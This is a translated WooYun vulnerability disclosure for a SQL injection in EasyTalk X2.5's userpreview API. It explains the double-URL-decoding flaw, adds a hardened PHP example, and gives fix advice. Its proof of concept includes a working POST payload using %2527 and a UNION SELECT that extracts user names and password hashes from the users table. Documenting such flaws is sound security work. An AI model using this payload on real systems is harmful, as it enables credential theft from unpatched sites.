
Vulnerability summary

Defect ID: wooyun-2014-051534

Title: EasyTalk SQL injection vulnerability

Vendor: nextsns.com

Author: My5t3ry

Submitted: 2014-02-22 22:50

Fixed: 2014-05-23 22:51

Published: 2014-05-23 22:51

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-02-22: Details sent to the vendor, awaiting vendor handling
2014-02-22: Vendor confirmed; details disclosed to the vendor only
2014-02-25: Details opened to third-party security partners
2014-04-18: Details disclosed to core white hats and relevant domain experts
2014-04-28: Details disclosed to regular white hats
2014-05-08: Details disclosed to intern white hats
2014-05-23: Details disclosed to the public

Brief description:

One SQL injection in the latest EasyTalk_X2.5.

Details:

The vulnerability is in /Home/Lib/Action/ApiAction.class.php, in the following method:

public function userpreview() {
    // Injection point: the POST value is URL-decoded a second time, after the
    // framework's input filtering has already run, and then interpolated below.
    $username=trim(rawurldecode($this->_post('username')));
    if ($username) {
        parent::init();
        // $username is concatenated into the WHERE clause without escaping.
        $user = M('Users')->where("user_name='$username'")->find();
        if ($user) {
            if ($user['cityid']) { // user's location
                $dtModel=M('District');
                $pdata = $dtModel->where("id='$user[cityid]'")->find();
                $pdata2 = $dtModel->where("id='$pdata[upid]'")->find();
                $user['live_city']=$pdata2['name'].' '.$pdata['name'];
            }
            $isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']);
            $f="<span id='followsp2_".$user['user_id']."'>";
            if($isfriend[$user['user_id']]==1){
                $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')."&nbsp;|&nbsp;<a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
            }else if ($isfriend[$user['user_id']]==3){
                $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico.gif'> ".L('follow_followed')."&nbsp;|&nbsp;<a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
            }else{
                $f.="<a class='bh' onclick=\"followop('addfollow/user_id/{$user[user_id]}','gz','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('have_a_follow')."</a>";
            }
            $f.="</span>";
            if ($user['user_id']==$this->my['user_id']) {
                $body2='';
            } else {
                $body2='<div class="fleft"><input type="button" value="'.L('send_message').'" onclick="sendprimsgbox(\''.$user['nickname'].'\')" class="button5">&nbsp;&nbsp;&nbsp;<input type="button" value="@TA" onclick="talkBox(\'@'.$user['nickname'].' \')" class="button5"></div><div class="fright">'.$f.'</div>';
            }
            if(time()-$user['last_login']<=600){
                if($user['isadmin']>0){
                    $zxico='<span class="adminico"> '.L('admin_online').'</span>';
                } else {
                    $zxico='<span class="uonlineico"> '.L('user_online').'</span>';
                }
            } else {
                $zxico='<span class="uofflineico"> '.L('user_offline').'</span>';
            }
            // The rendered preview card echoes whatever the query returned,
            // which is how the UNION result below becomes visible to the caller.
            echo '<div class="body1">
<div class="limg"><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank"><img src="'.sethead($user['user_head']).'" width="50px" height="50px"></a></div>
<div class="linfo">
<p>
<div class="fleft">
<span class="'.setvip($user['user_auth']).'" '.viptitle($user['user_auth']).'><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['nickname'].'</a></span>
</div>
<div class="fright" style="width:90px;font-size:12px">'.$zxico.'</div>
<div class="clearline"></div>
</p>
<p>'.($user['user_gender']==1?L('male'):L('female')).'&nbsp;&nbsp;'.$user['live_city'].'</p>
<p>'.L('follow').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=following" target="_blank">'.$user['follow_num'].'</a>&nbsp;&nbsp;'.L('follower').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=follower" target="_blank">'.$user['followme_num'].'</a>&nbsp;&nbsp;'.L('talk').'<a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['msg_num'].'</a></p>
</div>
<div class="clearline"></div>
<div class="linfo2">';
            if ($user['user_auth']) {
                echo getsubstr($user['auth_info'],0,35);
            } else {
                echo L('user_info').':'.getsubstr($user['user_info']?$user['user_info']:L('nothing_write'),0,35);
            }
            echo '</div>
</div>
<div class="body2">'.$body2.'</div>';
        } else {
            echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
        }
    } else {
        echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
    }
}


The problem is this line:
    $username=trim(rawurldecode($this->_post('username')));
PHP has already URL-decoded the POST body once by the time the framework's input filtering sees the value. Calling rawurldecode on it a second time means a value sent as %2527 reaches the filter as %27 (no quote, so nothing to escape) and only becomes a literal single quote afterwards, at which point it is concatenated straight into the WHERE clause. This double decoding is what makes the injection possible.

Proof of vulnerability:

[Screenshot: sql3.jpg]


URL:
http://192.168.116.129/easytalk/?m=api&a=userpreview
POST data:
username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23
The query that finally reaches the database is:

SELECT * FROM `et_users` WHERE user_name='my5t3ry'/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users#' LIMIT 1

Fix:

Escape the input.
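The following is an added example, not EasyTalk's code, written to make the order-of-operations defect concrete and to show the hardened form the fix calls for. It models the vulnerable flow (filter, then rawurldecode, then string interpolation) beside a version that decodes once and binds the value as a query parameter. The names frameworkFilter, buildQueryVulnerable, findUserSafe and sampleDb are hypothetical; frameworkFilter is a constructed stand-in for the framework's input filter (addslashes, so that an already-present quote is visibly escaped), not a reproduction of the real one, and the in-memory database assumes the pdo_sqlite extension is loaded.

```php
<?php
// Added example, not EasyTalk's code. Models the defect in ApiAction::userpreview():
// PHP URL-decodes the POST body once, the input filter runs on that value, and then
// rawurldecode() decodes it a second time. A request sent as "%2527" arrives as
// "%27", contains no quote when the filter looks at it, and becomes "'" only after
// the filter has finished. All function names below are hypothetical.

// Constructed stand-in for the framework's input filter (the real filter is not
// reproduced here): escape quotes the way addslashes() does.
function frameworkFilter(string $raw): string
{
    return addslashes($raw);
}

// Vulnerable flow, same order of operations as the original method: filter,
// then rawurldecode(), then interpolation into the SQL string.
function buildQueryVulnerable(string $postedUsername): string
{
    $username = trim(rawurldecode(frameworkFilter($postedUsername)));
    return "SELECT * FROM users WHERE user_name='$username' LIMIT 1";
}

// Hardened flow: decode first (so nothing is left to decode later) and bind the
// value as a parameter; its content can no longer change the SQL structure.
function findUserSafe(PDO $db, string $postedUsername): ?array
{
    $username = trim(rawurldecode($postedUsername));
    $stmt = $db->prepare('SELECT * FROM users WHERE user_name = :name LIMIT 1');
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory table with two sample rows (assumes pdo_sqlite).
function sampleDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT)');
    $db->exec("INSERT INTO users (user_name, password) VALUES ('alice', 'hash-a'), ('bob', 'hash-b')");
    return $db;
}

// Values as PHP hands them to the application after its single decode of the body:
// a wire value of username=alice%27 arrives as "alice'" (a plain quote, which the
// filter escapes); a wire value of username=alice%2527 arrives as "alice%27".
$singleDecoded = "alice'";
$doubleEncoded = "alice%27";

// With the plain quote the filter backslash-escapes it and the query stays intact.
echo buildQueryVulnerable($singleDecoded), "\n";
// With %27 the filter sees no quote; rawurldecode() then drops a bare quote into
// the SQL string, which is exactly what the %2527 in the advisory's POST data relies on.
echo buildQueryVulnerable($doubleEncoded), "\n";

// The bound version looks every value up literally: only the real name matches.
$db = sampleDb();
var_dump(findUserSafe($db, 'alice'));
var_dump(findUserSafe($db, $singleDecoded));
var_dump(findUserSafe($db, $doubleEncoded));
```

Two points for whoever applies the fix: do any decoding before escaping, never after, and prefer parameter binding over escaping so the order stops mattering at all. In ThinkPHP 3.x, passing the condition as an array (where(array('user_name' => $username))) lets the framework quote the value instead of interpolating it into a string; confirm that behaviour against the framework version actually bundled with EasyTalk.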

Copyright notice: when reposting, please credit the source: My5t3ry@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-02-22 23:19

Vendor reply:

Being fixed

Latest status:

None yet